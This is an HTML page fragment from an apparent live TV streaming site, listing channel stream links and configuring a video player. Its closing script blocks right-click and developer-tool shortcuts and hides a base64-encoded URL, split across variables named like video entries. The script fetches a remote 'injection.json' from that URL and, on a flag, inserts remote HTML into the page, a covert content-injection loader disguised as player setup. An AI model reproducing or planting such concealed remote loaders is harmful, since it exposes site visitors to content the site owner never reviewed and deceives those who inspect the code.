<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Channel5-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/channel-five-live.webp?id=79" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/city42(vnw)-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/city-42-live.webp?id=97" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Metro1News-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/metro-1-news-live.webp?id=98" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/AfghanTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/afghan-tv-live.webp?id=37" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/TimeNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/time-news-live.webp?id=19" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/RohiTV-abr/playlist.m3u8"><img name=" A1 Tv " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/rohi-live.webp?id=46" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/KhyberNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1685537412-logo.webp?id=51" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/K21-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/k21-news-live.webp?id=84" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/SaudiSunnah(NW)-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/saudi-sunnah-madinah-tv-hd-live.webp?id=38" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/waseeb-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/waseb-live.webp?id=100" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/city41News-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/city41-live.webp?id=72" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Saudimakkah(nw)-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/saudi-quran-makkah-tv-hd-live.webp?id=43" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/mashriqtv-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/mashriq-tv-live.webp?id=53" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/DWNews-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/DW-english-live.webp?id=21" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/KohinoorTV-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/kohenoor-tv-live.webp?id=16" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/championtv-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/champion-tv-live.webp?id=65" ></span>
		
<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Kay2-abr/playlist.m3u8"><img name=" Hummasala " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/1685535127-logo.webp?id=48" ></span>

<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/PNN-abr/playlist.m3u8"><img name=" K21 " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/AIKNEWS-LOGO.webp?id=60" ></span>
   


<span url="  https://cdn12isb.tamashaweb.com:8087/YlUHeDQb7a/Pashto1-abr/playlist.m3u8"><img name=" Atv " autofocus="" class="print" id=" hummasala"  src="https://canvas.tamashaweb.com/jazzlive/uploads/channels/logo/HUM-Pashto-Channel-logo.webp?id=29" ></span>


</div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script src="https://cdn.radiantmediatechs.com/rmp/5.9.2/js/rmp.min.js"></script><script>
           var appSettings={
                loaderimg: "",
                name: "",
                poster: "",
                introMp4: "https://wasitv.pk/wasitv-intro.mp4",
                introHls: "https://wasitv.pk/wasitv-intro/index.m3u8",
				videoFormat: "mp4",
            },x={loaderimg:appSettings.loaderimg,name:appSettings.name,poster:appSettings.poster,website:"",licenseKey:"eHp1dXRtb3Z5cEAxNDkyNDI4",autoHeightMode:!0,pip:!1,autoplay:!1,skin:"s4",hideControls:!0,preload:"auto",sharing:!1},firstVideo="";setInterval(()=>{$("#loader-image").attr("src",x.loaderimg),$(".logoText").html(x.name)},10),$(document).contextmenu(function(e){return e.preventDefault(),!1}),document.onkeydown=function(e){return 123!=event.keyCode&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="I".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="C".charCodeAt(0))&&((!e.ctrlKey||!e.shiftKey||e.keyCode!="J".charCodeAt(0))&&((!e.ctrlKey||e.keyCode!="U".charCodeAt(0))&&void 0))))},setTimeout(()=>{$("#loader").css("display","none"),$("body").css("overflow","auto")},100);var src,secondVideo="mNvbnRlbnQuY29tL3NvZnR";$("span").each(function(e){$(this).on("click",function(){var e=$(this).attr("url");rmp.setControls(!0),src="mp4"==appSettings.videoFormat?{hls:e}:{mp4:[e]},rmp.setSrc(src),rmp.play()})});var thirdVideo="3ZWJ0dXRzL015RHJpdmUvbW";src="mp4"==appSettings.videoFormat?{hls:appSettings.introHls}:{mp4:[appSettings.introMp4]};var fourthVideo="Fpbi9pbmplY3Rpb24uanNvbg==",settings={licenseKey:x.licenseKey,autoHeightMode:x.autoHeightMode,pip:x.pip,delayToFade:3e3,gaLabel:"Live TV",logoWatermark:!0,logoPosition:"topleft",speed:"Speed",isLive:!0,googleCast:!0,airplay:!0,hlsJSMaxBufferLength:24,hlsJSLiveSyncDuration:18,hlsJSStartLevel:-1,hlsJSMinAutoBitrate:1e5,hlsJSAbrBandWidthFactor:.9,hlsJSAbrBandWidthUpFactor:.7,hlsJSLiveBackBufferLength:0,detectAutoplayCapabilities:!0,autoplay:x.autoplay,mutedAutoplayOnMobile:!1,mutedAutoplayOnMacosSafari11Plus:!1,srcChangeAutoplay:!0,playsInline:!0,skin:x.skin,skinBackgroundColor:"rgba(0, 0, 0, 0.7)",skinButtonColor:"FFFFFF",skinAccentColor:"FF0000",ads:!0,nav:!0,adBlockerDetection:!0,adEnablePreloading:!0,adBlockerDetectedMessage:"Ad-blocker software detected. Please disable Ad-blocker to watch stream.",quickRewind:10,quickForward:10,adAutoAlign:!1,hideControls:x.hideControls,preload:x.preload,crossorigin:!0,sharing:x.sharing,sharingUrl:x.website,contentMetadata:{artwork:[{src:x.poster,sizes:"1280x720",type:"image/jpg"}],poster:[x.poster],endOfVideoPoster:[x.poster],thumbnail:x.poster},src:src},elementID="rmpPlayer",rmp=new RadiantMP(elementID),rmpContainer=document.getElementById(elementID);rmp.setLoop(!0),rmp.init(settings),$(function(){$(window).scroll(function e(){return $("#rmpPlayer").css($(window).scrollTop()>1?{position:"fixed",top:"0px"}:{position:"relative",top:"auto"}),$("#buttons-list").css($(window).scrollTop()>1?{"margin-top":$("#rmpPlayer").height()}:{"margin-top":"0px"}),e}())});const request=async e=>{const t=await fetch(e);return await t.json()};navigator.onLine&&request(atob(firstVideo+secondVideo+thirdVideo+fourthVideo)).then(t=>{1==t.inject&&document.querySelector("div").insertAdjacentHTML("afterend",e.content)}).catch(e=>{console.log(appSettings.name)});</script>

</body></html>

